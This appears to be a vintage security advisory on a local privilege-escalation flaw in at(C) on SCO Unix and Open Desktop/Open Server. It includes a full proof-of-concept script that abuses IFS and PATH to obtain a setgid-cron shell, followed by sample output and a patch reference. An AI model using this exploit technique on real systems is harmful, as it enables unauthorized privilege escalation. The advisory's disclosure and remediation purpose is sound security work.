COMMAND

    at(C)

SYSTEMS AFFECTED

    SCO Unix System V/386 Release 3.2 Versions 4.2, 4.1, and 4.0
    SCO Open Desktop Lite Release 3.0
    SCO Open Desktop Release 3.0 and 2.0
    SCO Open Server Network System Release 3.0
    SCO Open Server Enterprise System Release 3.0

PROBLEM

    at(1) can be used to execute arbitrary commands as group cron.

    at(1) was originally  designed to run  setuid root.   SCOs version
    of  at  runs  setgid  cron,  but  still  handles  privileges as if
    running  euid  0.   at(1)  uses  popen(3)  to  attempt  to execute
    /bin/pwd.  at(1) resets neither IFS nor PATH, this allowing us  to
    subvert the /bin/pwd command.

    1. Create the file atbug:

    ------------------------- cut here ---------------------------
    IFS=/
    export IFS
    PATH=.:$PATH
    export PATH
    cat > bin << EOF
    #!/bin/sh
    IFS=" " export IFS
    cp /bin/sh /tmp/sh.$$
    chgrp cron /tmp/sh.$$
    chmod 2755 /tmp/sh.$$
    EOF
    chmod 777 bin
    at 1200 < /dev/null
    IFS=" " export IFS
    echo created /tmp/sh.$$
    exit 0
    ------------------------- cut here ---------------------------

    2. Execute the commands:

    % chmod 700 atbug
    % ./atbug
    warning: commands will be executed using /bin/sh
    job XXXXXXXXX.a at <whatever>
    created /tmp/sh.20558
    % /tmp/sh.1485
    $ id
    .... egid=16(cron) ....
    $

SOLUTION

    Obtain a patch from SCO.
    The patch is available at ftp.sco.COM:/SSE/sse001.*